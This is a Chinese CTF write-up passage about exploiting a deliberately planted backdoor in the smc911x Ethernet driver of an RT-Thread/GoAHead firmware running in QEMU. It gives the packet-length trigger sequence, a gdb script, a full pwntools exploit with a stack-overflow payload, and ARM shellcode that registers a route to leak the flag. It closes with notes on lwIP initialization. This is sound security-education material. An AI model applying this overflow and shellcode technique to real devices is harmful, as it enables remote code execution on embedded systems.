那如何调用这个 submit 呢？通过字符串搜索可以得出 /web/submit.jst 这个路由路径，因此我们可以通过访问 http://localhost:5555/submit.jst URL 来进入这个页面：

通过先前的逆向过程和网络抓包可以得知，GoAHead 会使用到 Session 技术。因此若我们在该界面提交一串数据后，当我们下一次再访问这个界面，则先前提交的数据将仍然会显示在这里。

submit 接口暂时告一段落。根据打题的师傅所说，GoAHead 除了增加 submit 功能以外，其余部分基本没动过。根据我进一步所查询的资料，backdoor 应该是位于 RT-thread（一个国产 RTOS）中 lwIP模块的 smc911x 驱动中…

沉思，这个 backdoor 其他师傅们是怎么找出来的…

这里直接开天眼，backdoor 位于地址 0x6001B024 中（smc911x_eth_rx 函数，用于接收数据包），以下是 IDA 反编译+自己简单恢复符号后的结果：

int __fastcall smc911x_emac_rx_backdoor(int a1)
{
  int *v1; // r4
  char v4[64]; // [sp+Ch] [bp-70h] BYREF
  int v5[2]; // [sp+4Ch] [bp-30h] BYREF
  int *v6; // [sp+54h] [bp-28h]
  int pktlen; // [sp+58h] [bp-24h]
  int status; // [sp+5Ch] [bp-20h]
  int v9; // [sp+60h] [bp-1Ch]
  int *data; // [sp+64h] [bp-18h]
  unsigned int v11; // [sp+68h] [bp-14h]
  int v12; // [sp+6Ch] [bp-10h]

  v12 = 0;
  v9 = a1;
  if ( !a1 )
    rt_assert_handler(byte_600704AC, 0);
  if ( (unsigned __int8)((unsigned int)smc911x_reg_read(v9, 124) >> 16) )
  {
    status = smc911x_reg_read(v9, 64);
    pktlen = HIWORD(status) & 0x3FFF;
    smc911x_reg_write(v9, 0x6C, 0);
    v11 = (unsigned int)(pktlen + 3) >> 2;
    v12 = pbuf_alloc(0, 4 * v11, 0x280u);
    if ( v12 )
    {
      data = *(int **)(v12 + 4);
      while ( v11-- )
      {
        v1 = data++;
        *v1 = smc911x_reg_read(v9, 0);
      }
    }
    if ( (status & 0x8000) != 0 )
      rt_kprintf("EMAC: dropped bad packet. Status: 0x%08x\n", status);
    v5[0] = dword_60079E78 + 0x16D6DD4;         // backdoor
    v5[1] = dword_60079E7C + 0xC25FBB;
    v6 = v5;
    if ( pktlen == (unsigned __int8)(dword_60079E78 - 0x2C) )// 0x62
    {
      backdoor_time = time(0);
      backdoor_cnt = 1;
    }
    else if ( pktlen == *((unsigned __int8 *)v6 + backdoor_cnt) && time(0) - backdoor_time <= 4 )
    {
      ++backdoor_cnt;
    }
    if ( backdoor_cnt == 8 && pktlen == 0x202 && v12 )
      diy_memcpy((int)v4, *(_DWORD *)(v12 + 4), pktlen);
  }
  return v12;
}

而这是该函数的源码（注意函数版本不同，会带来一些差异）：

/* reception packet. */
struct pbuf *smc911x_emac_rx(rt_device_t dev)
{
    struct pbuf *p = RT_NULL;
    struct eth_device_smc911x *emac;

    emac = SMC911X_EMAC_DEVICE(dev);
    RT_ASSERT(emac != RT_NULL);

    /* take the emac buffer to the pbuf */
    if (LAN9118_RX_FIFO_INF_RXSUSED(smc911x_reg_read(emac, LAN9118_RX_FIFO_INF)))
    {
        uint32_t status;
        uint32_t pktlen, tmplen;

        status = smc911x_reg_read(emac, LAN9118_RXSFIFOP);

        /* get frame length */
        pktlen = (status & LAN9118_RX_STS_PKT_LEN) >> 16;

        smc911x_reg_write(emac, LAN9118_RX_CFG, 0);

        tmplen = (pktlen + 3) / 4;

        /* allocate pbuf */
        p = pbuf_alloc(PBUF_RAW, tmplen * 4, PBUF_RAM);
        if (p)
        {
            uint32_t *data = (uint32_t *)p->payload;
            while (tmplen--)
            {
                *data++ = smc911x_reg_read(emac, LAN9118_RXDFIFOP);
            }
        }

        if (status & LAN9118_RXS_ES)
        {
            rt_kprintf(DRIVERNAME ": dropped bad packet. Status: 0x%08x\n", status);
        }
    }

    return p;
}

对照可以得出，backdoor 触发条件如下：

发送 8个 payload 数据包，其长度与某个特定数组中的对应 uchar 型数据（即 backdoor 字符串）相等
整个触发 backdoor 的时间必须在 5s 内完成
当 backdoor 计数器为 8 且下一个发送的那个 payload 数据包长度为 0x202

这样就可以触发一个向 0x64 大小的数组覆写 0x202 大小数据的缓冲区溢出漏洞。

由于该题没有 NX、PIE、ASLR 等保护，因此我们可以通过缓冲区溢出来劫持控制流，执行我们的 shellcode，然后一定要在 shellcode 执行完成后恢复函数的栈数据等，并跳转回之前的函数。

实时操作系统没有内核的概念，因此如果运行时环境被破坏，控制流无法继续执行，则整个操作系统将立即重启/终止，无法继续执行。

这里，我们需要精心设计 shellcode，这里列出两种解法：

手动注册一个 action/backdoor 对应的事件处理例程和路由，将传入的 flag 直接复制至别的文件数据（例如 /path/to/file1）中，这样当 health checker 将 flag 传给 action/backdoor 时，我们便可以通过访问 /path/to/file1 直接获取到 flag。
patch 掉错误界面的显示，使其一直显示 {"status" : "success"} 和返回 HTTP200 状态码。之后 patch 错误界面显示相关的代码，使其引用存在题目内存中的 flag，这样当我们下一次访问错误界面时，即可读取到内存中的 flag 并将其返回给网页前端。

六、漏洞利用

a. 触发 backdoor

这里选择第一种方法（挑战一下），手动注册 action/backdoor 的事件处理例程和路由。

通过动态调试得知：

数据包的 metadata 长度为 0x3a，因此我们在发送数据时需要减去该长度。
发送数据包时，一定要间隔发送。否则多个数据包可能会因为网络问题乱序到达，无法通过 backdoor check。
程序可能会多次接受其它不来自于攻击者的数据包（长度0x3e左右，来源未知），因此在调试时需要过滤掉这种情况。

根据上面的分析，我们可以编写出以下的代码来触发漏洞：

#! python3
from pwn import *
context(
    os='linux',
    arch='arm',
    bits=32,
    encoding='latin',
    log_level="debug"
)

def send_packet(packet_len, data=b''):
    p = remote("127.0.0.1", 5555)
    remain_len = packet_len - len(data)
    assert remain_len >= 0
    p.send(data + b"_" * remain_len)
    p.close()
    time.sleep(0.2)

if __name__ == '__main__': 
    for ch in "backdoor": # \x62 \x61 \x63 \x6b \x64 \x6f \x6f \x72
        send_packet(ord(ch) - 0x3a)
    send_packet(0x202 - 0x3a)

还记得漏洞触发必须在 4s 内完成，因此编写了该 gdb script 辅助调试：

target remote localhost:1234
b *0x6001b1b4
commands
    if $r3 > 0x60
        printf "packet len = 0x%x\n", $r3
    end
    continue
end

b* 0x6001B1BC
commands
    printf "backdoor_cnt = 0\n"
    continue
end

b* 0x6001B250
commands
    printf "backdoor_cnt = %d\n", $r2
    continue
end

b* 0x6001B298
commands
    printf "backdoor_memcpy called\n"
    tb *0x6001b2a8
    # continue
end

b* 0x600101E4
commands
    printf "submit handler called\n"
    printf "Webs* wp = 0x%x\n", $r0
    continue
end

b* 0x60010208
commands
    printf "submit handler websGetVar called\n"
    continue
end

# b* 0x60d9c5e8     shellcode ret
# b* 0x60d9c5ec     handler address

c

执行效果如下，可以看到成功栈溢出：

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x62

Breakpoint 2, 0x6001b1bc in ?? ()
backdoor_cnt = 1

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x61

Breakpoint 3, 0x6001b238 in ?? ()
backdoor_cnt = 2

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x63

Breakpoint 3, 0x6001b238 in ?? ()
backdoor_cnt = 3

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x6b

Breakpoint 3, 0x6001b238 in ?? ()
backdoor_cnt = 4

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x64

Breakpoint 3, 0x6001b238 in ?? ()
backdoor_cnt = 5

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x6f

Breakpoint 3, 0x6001b238 in ?? ()
backdoor_cnt = 6

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x6f

Breakpoint 3, 0x6001b238 in ?? ()
backdoor_cnt = 7

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x72

Breakpoint 3, 0x6001b238 in ?? ()
backdoor_cnt = 8

Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
Breakpoint 1, 0x6001b1b4 in ?? ()
packet len = 0x202

Breakpoint 4, 0x6001b298 in ?? ()
backdoor_memcpy called

并将机器打崩：

打崩后，先按下 ctrl + a，松手再按下 x 以关闭 QEMU 。

重新调试回到栈溢出的函数调用位置。注意调用函数时，函数传参分别是 R0、R1、R2。

b. 栈溢出与 shellcode 上传

之后我们需要将当前栈上的数据 dump 下来，并在栈溢出时完整的覆盖回去，保证栈数据的完整性。因为覆盖长度为 0x202，一定会覆盖到下面的栈帧，因此务必恢复，否则可能会导致 crash。

需要注意的是，栈溢出能给自己写 shellcode 的空间很有限，只有大约 0x20，因此我们必须用其他方式来上传自己的 shellcode，然后在栈溢出这里只修改返回值来达到跳转执行的目的。

而上传 shellcode 可以用之前 GoAHead 扩展的 submit 方法，动态调试可以得知存放 submit message 的内存地址。

但是，栈溢出跳转时，跳转的 shellcode 地址不是这个 v4，因为当栈溢出时，v4 这块内存已经被覆写了：

那该如何获取到 shellcode 的地址呢？我们可以在 shellcode 前增加一些字符串，例如 “ShellcodeHeader”，然后使用 gdb 命令 find 全局搜索内存来找到 shellcode 地址：

1 2	find 0x60000000, +0x4000000, 'S','h','e','l','l','c','o','d','e' # 不使用 find xxx, +xxx, "Shellcode" 是因为这会匹配末尾的 \0

查询结果如下。注意下面的 shellcode 被 URL 转码了（这就是另外的问题了）：

或者逆向 websSetSessionVar 函数，找到复制出的字符串地址也是可以的。

还有一点，将 shellcode 进行 submit 操作之前，一定要对当前会话进行 login 操作，否则内存中将无法搜索到 shellcode。

c. shellcode 的作用

shellcode 要做的事情主要有两件：

执行 websDefineAction("backdoor", backdoor_handler)注册处理例程。其中：

1	websDefineAction address: 0x6004D28C

“backdoor” 字符串无需持久化，因为该字符串会在执行 websDefineAction 时被拷贝进哈希表中。

但 backdoor_handler 需要持久化，因此务必将其拷贝至一个稳定的地方（例如文件系统中，这里我选择将 handler shellcode 复制进 /login_err.html + 0x200 的位置，即 0x606D3aD0）

backdoor handler 需要做的事情有几件：

将 checker 可能传入的 flag 复制至 404 界面。
返回一个 200 {“status”:“success”} 界面

static void backdoor_handler(Webs *wp)
{
    const char* key = "flag";
    const char* page = "{\"status\" : \"success\"}"
    // 给第三个参数传参 key 是为了避免在找不到值的情况下返回 NULL，便于编写 shellcode
    char* name = websGetVar(wp, key, key); // websGetVar：0x600577C4
    // 将 flag 输出
    rt_printf(name); 
    // send page
    websSetStatus(wp, 200);      // websSetStatus:       0x600588C4
    websWriteHeaders(wp, -1, 0); // websWriteHeaders:    0x6005891C
    websWriteEndHeaders(wp);     // websWriteEndHeaders: 0x60058D30
    websWrite(wp, page);         // websWrite:           0x60058E2C
    websDone(wp);                // websDone:            0x6005496C
}

这里返回 200 OK 数据的写法，主要参考 goahead/blob/master/test/test.c#L327 的写法：

/*
    Implement /action/actionTest. Parse the form variables: name, address and echo back.
 */
static void actionTest(Webs *wp)
{
  cchar   *name, *address;

  name = websGetVar(wp, "name", NULL);
  address = websGetVar(wp, "address", NULL);
    websSetStatus(wp, 200);
    websWriteHeaders(wp, -1, 0);
    websWriteEndHeaders(wp);
  websWrite(wp, "name: %s, address: %s
\n", name, address);
    websFlush(wp, 0);
  websDone(wp);
}

执行 websAddRoute("/action/backdoor", "action", 0)重新注册路由表。

1	websAddRoute() addr: 0x600636A0

注意第三个参数为 0，由于路由表是以数组形式顺序访问，因此将 pos 设置为 0 可以将目标路由放至第一个。

踩过的坑：先前重新注册路由表，是打算先覆写 route.txt，再执行 websLoad("route.txt")。但是后来阅读源码，发现这样做太过于麻烦：

/*
    Load route and authentication configuration files
 */
PUBLIC int websLoad(cchar *path)
{
    ...
        
    for (line = stok(buf, "\r\n", &token); line; line = stok(NULL, "\r\n", &token)) {
        kind = stok(line, " \t", &next);
        ...
        if (smatch(kind, "route")) {
            auth = dir = handler = protocol = uri = 0;
            abilities = extensions = methods = redirects = -1;
            while ((option = stok(NULL, " \t\r\n", &next)) != 0) {
                key = stok(option, "=", &value);
                if ...
                } else if (smatch(key, "handler")) {
                    handler = value;
                } else if (smatch(key, "methods")) {
                    addOption(&methods, value, 0);
                } else if (smatch(key, "redirect")) {
                    if (strchr(value, '@')) {
                        status = stok(value, "@", &redirectUri);
                        if (smatch(status, "*")) {
                            status = "0";
                        }
                    } else {
                        status = "0";
                        redirectUri = value;
                    }
                    ...
                } ...
                } else if (smatch(key, "uri")) {
                    uri = value;
                } else {
                    error("Bad route keyword %s", key);
                    continue;
                }
            }
            if ((route = websAddRoute(uri, handler, -1)) == 0) {
                rc = -1;
                break;
            }
            websSetRouteMatch(route, dir, protocol, methods, extensions, abilities, redirects);
#if ME_GOAHEAD_AUTH
            if (auth && websSetRouteAuth(route, auth) < 0) {
                rc = -1;
                break;
            }
        } ...
    }
    ...
    return rc;
}

通读源码可以看到，我们只需执行 websAddRoute("/action/backdoor", "action", 0) ，即可成功将 backdoor 路由注册进路由表中。而且还可以指定第三个参数，将 backdoor 路由放置进路由表的最前端。

默认情况下 route 的其他字段为 -1，因此 route 中的 dir、protocol、methods 等不会参与路由匹配。所以下面那个 websSetRouteMatch 函数我们可以不用手动执行。

d. 遇到的其他坑点

继续写 exp 时遇到了一些问题：

submit 的 shellcode 会被 GoAHead 进行 URL 编码：
因此在发送 submit 请求时，需要加上 HTTP header 显式告知 GoAHead 无需编码：
1
"Content-Type":"application/x-www-form-urlencoded"
需要注意的是，既然都标上这个了，发送的 data 就不能是 json 了（即不能发送 {'word': shellcode}），因为这还是会让远程忽略该 header 进行 URL 编码。
pwntools 编码 shellcode 时报错：pwnlib.exception.PwnlibException: Could not find 'as' installed for ContextType(arch = 'arm', bits = 32, encoding = 'latin', endian = 'little', log_level = 10, os = 'linux')
这是因为我的机器上没有安装 ARM 编译相关的环境等等，执行以下命令安装即可：
1
sudo apt-get install binutils-arm-linux-gnueabi
gdb pwndbg 中， p/x $fp 显示的是 $sp 的值，但实际上 $fp 和 $r11 是同一个寄存器，有点奇怪，可能是 gdb bug。
若出现以下情况，则需要重启 linux（重启 qemu 已经没用了），或者直接进 docker 中调试：
- gdb find 出来的 shellcode 地址不固定
- 每次执行时栈溢出所在栈上数据，有好几个指针的值每次都不同
  根据本人调试，每次栈上数据最多只会有一个非指针值发生改变，并且不影响程序执行。

e. 本地 exploit

没试过远程，因为远程关了…

#! python3
from pwn import *
import requests
context(
    arch='arm',
    bits=32,
    encoding='latin',
    log_level="info"
)

baseURL = "http://localhost:5555"

def create_session():
    session = requests.session()
    login_data = {"username": "admin", "password": "admin"}
    res = session.post(url=baseURL+"/action/login", data=login_data)
    assert res.status_code == 200
    return session

def submit_msg(session, msg):
    # submit_data = msg # {"word": msg}
    
    res = session.post(
        url=baseURL+"/action/submit", 
        headers={ "Content-Type":"application/x-www-form-urlencoded" },
        data=msg)
    assert res.status_code == 200

# def get_last_submit_msg(session):
#     res = session.get(url=baseURL+"/submit.jst")
#     assert res.status_code == 200
#     return res.content

def execute_shellcode(shellcode_addr=0x6004cb30):
    def send_packet(packet_len, data=b''):
        p = remote("127.0.0.1", 5555)
        remain_len = packet_len - len(data)
        assert remain_len >= 0
        p.send(data + b"*" * remain_len)
        p.close()
        time.sleep(0.3)

    for ch in "backdoor": # \x62 \x61 \x63 \x6b \x64 \x6f \x6f \x72
        send_packet(ord(ch) - 0x3a)
    send_packet(0x202 - 0x3a, flat(
        "-"*0xa,
        0x6b636162,      0x726f6f64,      0x60e4297c,      0x00000202,
        0x02020000,      0x609a4208,      0x61cd29f8,      0xffffffff,
        0x61cd27e4,      0x60e52d58,      0x04040404,      0x60e429d4,
        shellcode_addr,  0x06060606,      0x00000000,      0x08080808,
        0x609a4208,      0x61cd278c,      0x6000001f,      0x00000001,
        0x2000001f,      0x11111111,      0x00000000,      0x00000000,
        0x00000000,      0x00000000,      0x00000000,      0x00000000,
        0x80000068,      0x60e428e8,      0x00000000,      0x60e52cf4,
        0x609a40e4,      0x60e429f0,      0x609a40dc,      0x00000001,
        0x60e3a994,      0x60e3a994,      0x60e429f0,      0x00000000,
        0x00000006,      0x60e3a9e8,      0x00787265,      0x00000000,
        0x00000000,      0x00000005,      0x00000000,      0x00000006,
        0x00000000,      0x0000007e,      0x00000000,      0x00000000,
        0x00000000,      0x00000000,      0x80000080,      0x60e42aac,
        0x60e42ac0,      0x60e42acc,      0x60e42abc,      0x00000000,
        0x60e42a70,      0xffffffff,      0x60e42a70,      0x60e42a70,
        0x00000001,      0x60e42a84,      0xffffffff,      0x60e4aaf8,
        0x60e4aaf8,      0x00000000,      0x00000008,      0x00000004,
        0x0000ffff,      0x00000000,      0x00000000,      0x00000000,
        0x60e52bc4,      0x60e52a9c,      0x60e52ab4,      0x60e72954,
        0x60e52a9c,      0x60e52a9c,      0x60e52ab4,      0x60e72954,
        0x00000000,      0x00000000,      0x80008008,      0xa5a5a5a5,
        0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,
        0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,
        0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,
        0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,
        0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,
        0xa5a5a5a5,      0xa5a5a5a5,      0xa5a5a5a5,      "\xa5\xa5",
    ))

shellcode_addr = 0x60d9c588
sc_bytecode = asm(vma=shellcode_addr, shellcode='''
    // save all registers
    push {r0-r11}

    // memcpy handler to /log_err.html + 0x200
    ldr r0, =0x606D3aD0 
    ldr r1, =backdoor_handler 
    ldr r2, =0x200         
    ldr r3, =0x60021704 
    BL call

    // call websDefineAction("backdoor", backdoor_handler)
    ldr r0, =backdoor     
    ldr r1, =0x606D3aD0   
    ldr r3, =0x6004D28C   
    BL call

    // rt_printf status
    mov r1, r0
    ldr r0, =rt_printf_fmt
    ldr r3, =0x6002111C
    BL call

    // websAddRoute("/action/backdoor", "action", 0)
    ldr r0, =route_path
    ldr r1, =route_handler
    mov r2, 0
    ldr r3, =0x600636A0
    BL call

    // pop all registers
    pop {r0-r11}

    // return to origin
    ldr pc, =0x6004cb30

/* ----------- backdoor_handler ----------- */
backdoor_handler:
    push {r1-r11, lr}
    push {r0}

    // char* name = websGetVar(wp, key, key);
    ldr r0, [sp]
    ldr r1, =flag
    ldr r2, =flag
    ldr r3, =0x600577C4
    BL call

    // memcpy to 404 data
    mov r1, r0
    ldr r0, =0x60076824
    // ldr r1, =success_page  
    ldr r2, =23          
    ldr r3, =0x60021704
    BL call

    // websSetStatus(wp, 200)
    ldr r0, [sp]
    ldr r1, =200
    ldr r3, =0x600588C4
    BL call

    // websWriteHeaders(wp, -1, 0)
    ldr r0, [sp]
    ldr r1, =-1
    ldr r2, =0
    ldr r3, =0x6005891C
    BL call

    // websWriteEndHeaders(wp)
    ldr r0, [sp]
    ldr r3, =0x60058D30
    BL call

    // websWrite(wp, page)
    ldr r0, [sp]
    ldr r1, =success_page
    ldr r3, =0x60058E2C
    BL call

    // websDone(wp)
    ldr r0, [sp]
    ldr r3, =0x6005496C
    BL call

    pop {r0}
    pop {r1-r11, pc}

call: // 手动实现 call r3
    push {lr}
    mov lr, pc
    add lr, lr, 4
    mov pc, r3 
    pop {pc}

flag:           .asciz  "flag"
backdoor:       .asciz  "backdoor"
success_page:   .asciz  "{\\"status\\" : \\"success\\"}"

route_path:     .asciz  "/action/backdoor"
route_handler:  .asciz  "action"

rt_printf_fmt:  .asciz  "shellcode status: %d\\n"
backdoor_fmt:   .asciz  "backdoor: %s\\n"
''')

if __name__ == '__main__': 
    # 启动 qemu
    p = process("./dbg.sh")
    p.recvuntil("lwIP-2.1.3 initialized!")
    time.sleep(1)

    # 发送并执行 shellcode
    log.info("exploiting...")
    session = create_session()
    submit_msg(session, b"ShellcodeHeader" + sc_bytecode)
    execute_shellcode(shellcode_addr)

    # 手动进行 health check，并获取 flag
    # print(p.recvall(timeout=1))
    # os.system("python3 ./flag.py")
    p.interactive()

效果：

七、RT-thread – lwIP

这题的题解如上文所示，到此为止。接下来我们来简单扩展一下内容。

a. Overview

这一题 FreeRTOS 中的 lwIP 协议栈模块，是使用的 RT-thread （国产 RTOS）中的 lwIP 。

根据出题人的想法，使用 RT-thread 中的 lwIP 是为了便于调试。
出题也不容易…

lwIP 是一个小型开源的 TCP/IP 协议栈，重点是在保持 TCP 主要功能的基础上减少对 RAM 的占用，适合嵌入式系统。RT-thread 中，协议栈的驱动架构图如下：

RT-thread 在原版 lwIP 的基础上，新增了一个网络设备层。该层对以太网数据收发采用独立双线程结构。

当以太网硬件接收到数据报文后，硬件会将数据放入缓冲区，之后触发硬件中断。所注册的中断处理例程会发送邮件（mail）通知数据接收线程 erx ，使其根据报文长度申请 pbuf、读入数据，并在数据接收完成后，继续发送邮件唤醒 TCP/IP 线程进行进一步的处理。

当有数据需要发送时，lwIP 会通过邮件向 etx 线程发送请求，之后永久等待 tx_ack 信号量，等待数据发送完成。而当 ext 线程数据发送完成后， tx_ack 信号量将会被设置，通知 lwIP 数据已经发送完成。

接下来，我们来简单看看这个数据收发的过程。

b. lwip_init

初始时，RTOS 中控制流会执行 lwip_system_init 函数来进行一系列的初始化操作。

/**
 * LwIP system initialization
 */
extern int eth_system_device_init_private(void);
int lwip_system_init(void)
{
    ...
    eth_system_device_init_private();
    ...
    tcpip_init(tcpip_init_done_callback, (void *)&done_sem);
    ...
    rt_kprintf("lwIP-%d.%d.%d initialized!\n", LWIP_VERSION_MAJOR, LWIP_VERSION_MINOR, LWIP_VERSION_REVISION);
    ...
}

该函数：

执行 eth_system_device_init_private 初始化 erx 和 etx 线程。
调用 tcpip_init 创建 tcpip 线程。
输出回显信息。可以看到这里输出的信息和题目输出的是一样的。

这里我们只关注 eth_system_device_init_private 函数，该函数只做了两件事：创建 etx 和 erx 线程，并创建对应的邮箱。

int eth_system_device_init_private(void)
{
    rt_err_t result = RT_EOK;

    /* initialize Rx thread. */
#ifndef LWIP_NO_RX_THREAD
    /* initialize mailbox and create Ethernet Rx thread */
    result = rt_mb_init(ð_rx_thread_mb, "erxmb",
                        ð_rx_thread_mb_pool[0], sizeof(eth_rx_thread_mb_pool)/4,
                        RT_IPC_FLAG_FIFO);
    RT_ASSERT(result == RT_EOK);

    result = rt_thread_init(ð_rx_thread, "erx", eth_rx_thread_entry, RT_NULL,
                            ð_rx_thread_stack[0], sizeof(eth_rx_thread_stack),
                            RT_ETHERNETIF_THREAD_PREORITY, 16);
    RT_ASSERT(result == RT_EOK);
    result = rt_thread_startup(ð_rx_thread);
    RT_ASSERT(result == RT_EOK);
#endif

    /* initialize Tx thread */
#ifndef LWIP_NO_TX_THREAD
    /* initialize mailbox and create Ethernet Tx thread */
    result = rt_mb_init(ð_tx_thread_mb, "etxmb",
                        ð_tx_thread_mb_pool[0], sizeof(eth_tx_thread_mb_pool)/4,
                        RT_IPC_FLAG_FIFO);
    RT_ASSERT(result == RT_EOK);

    result = rt_thread_init(ð_tx_thread, "etx", eth_tx_thread_entry, RT_NULL,
                            ð_tx_thread_stack[0], sizeof(eth_tx_thread_stack),
                            RT_ETHERNETIF_THREAD_PREORITY, 16);
    RT_ASSERT(result == RT_EOK);

    result = rt_thread_startup(ð_tx_thread);
    RT_ASSERT(result == RT_EOK);
#endif

    return (int)result;
}

我们看看 erx 线程主要干了什么事情：

/* Ethernet Rx Thread */
static void eth_rx_thread_entry(void* parameter)
{
    struct eth_device* device;

    while (1)
    {
        // 尝试从邮箱中读取邮件，如果没有邮件则一直阻塞
        if (rt_mb_recv(ð_rx_thread_mb, (rt_ubase_t *)&device, RT_WAITING_FOREVER) == RT_EOK)
        {
            rt_base_t level;
            struct pbuf *p;
            ...
            /* receive all of buffer */
            while (1)
            {
                if(device->eth_rx == RT_NULL) break;

                // 调用注册的 eth_rx 函数，从 device 中接收数据
                p = device->eth_rx(&(device->parent));
                if (p != RT_NULL)
                {
                    /* notify to upper layer */
                    // 在这里将接收到的数据传给 TCPIP 线程
                    if( device->netif->input(p, device->netif) != ERR_OK )
                    {
                        LWIP_DEBUGF(NETIF_DEBUG, ("ethernetif_input: Input error\n"));
                        pbuf_free(p);
                        p = NULL;
                    }
                }
                else break;
            }
        }
        else
        {
            LWIP_ASSERT("Should not happen!\n",0);
        }
    }
}

从代码中可以得知，该线程会循环读取邮箱 -> 从 device 中读取数据 -> 把读取的数据传给 TCPIP 线程这样的一个过程。

而另一个 etx 线程主要用于和硬件打交道，将 TCPIP 线程发至 etx 线程的数据转发给具体的 device 执行发包操作，待发包完成后发送 ack 回 TCPIP 线程：

/* Ethernet Tx Thread */
static void eth_tx_thread_entry(void* parameter)
{
    struct eth_tx_msg* msg;

    while (1)
    {
        // 阻塞读取邮件
        if (rt_mb_recv(ð_tx_thread_mb, (rt_ubase_t *)&msg, RT_WAITING_FOREVER) == RT_EOK)
        {
            struct eth_device* enetif;

            RT_ASSERT(msg->netif != RT_NULL);
            RT_ASSERT(msg->buf   != RT_NULL);

            enetif = (struct eth_device*)msg->netif->state;
            if (enetif != RT_NULL)
            {
                /* call driver's interface */
                // 尝试发包
                if (enetif->eth_tx(&(enetif->parent), msg->buf) != RT_EOK)
                {
                    /* transmit eth packet failed */
                }
            }

            /* send ACK */ // 发包完了之后发送 ACK 回到 TCPIP
            rt_completion_done(&msg->ack);
        }
    }
}

c. hw_init

上面是 lwIP 中关于 etx 和 erx 线程的初始化。实际的数据收发操作都是由具体的硬件来完成，那硬件是怎么注册的呢？

这里以 qemu-vexpress-a9 设备为例（没错就是 flag 题所用设备）

根据以下调用链：

/**
 * @brief  This function will call all levels of initialization functions to complete
 *         the initialization of the system, and finally start the scheduler.
 */
int rtthread_startup(void);
    
=> 调用 => 
    
/**
 * @brief  This function will create and start the main thread, but this thread
 *         will not run until the scheduler starts.
 */
void rt_application_init(void);

=> 创建 main 线程，线程执行函数 =>
 
/**
 * @brief  The system main thread. In this thread will call the rt_components_init()
 *         for initialization of RT-Thread Components and call the user's programming
 *         entry main().
 */
void main_thread_entry(void *parameter);

=> 调用 => 
    
/**
 * @brief  RT-Thread Components Initialization.
 */
void rt_components_init(void);

我们可以找到函数 rt_components_init 的实现：

/**
 * @brief  RT-Thread Components Initialization.
 */
void rt_components_init(void)
{
#if RT_DEBUG_INIT
    [...]
#else
    volatile const init_fn_t *fn_ptr;

    for (fn_ptr = &__rt_init_rti_board_end; fn_ptr < &__rt_init_rti_end; fn_ptr ++)
    {
        (*fn_ptr)();
    }
#endif /* RT_DEBUG_INIT */
}

这里，是不是很像先前使用 IDA 反编译 backdoor 向上找交叉引用的地方？

我们可以看到，该函数会遍历从 __rt_init_rti_board_end -> __rt_init_rti_end 上的每个函数指针，并执行。这两个函数指针代表了什么呢？阅读一下相关的代码和注释：

/*
 * Components Initialization will initialize some driver and components as following
 * order:
 * rti_start         --> 0
 * BOARD_EXPORT      --> 1
 * rti_board_end     --> 1.end
 *
 * DEVICE_EXPORT     --> 2
 * COMPONENT_EXPORT  --> 3
 * FS_EXPORT         --> 4
 * ENV_EXPORT        --> 5
 * APP_EXPORT        --> 6
 *
 * rti_end           --> 6.end
 *
 * These automatically initialization, the driver or component initial function must
 * be defined with:
 * INIT_BOARD_EXPORT(fn);
 * INIT_DEVICE_EXPORT(fn);
 * ...
 * INIT_APP_EXPORT(fn);
 * etc.
 */
static int rti_start(void) { return 0; }
INIT_EXPORT(rti_start, "0");

static int rti_board_start(void) { return 0; }
INIT_EXPORT(rti_board_start, "0.end");

static int rti_board_end(void) { return 0; }
INIT_EXPORT(rti_board_end, "1.end");

static int rti_end(void) { return 0; }
INIT_EXPORT(rti_end, "6.end");

还有这个宏定义：

1 2	#define INIT_EXPORT(fn, level) \ RT_USED const init_fn_t __rt_init_##fn RT_SECTION(".rti_fn." level) = fn

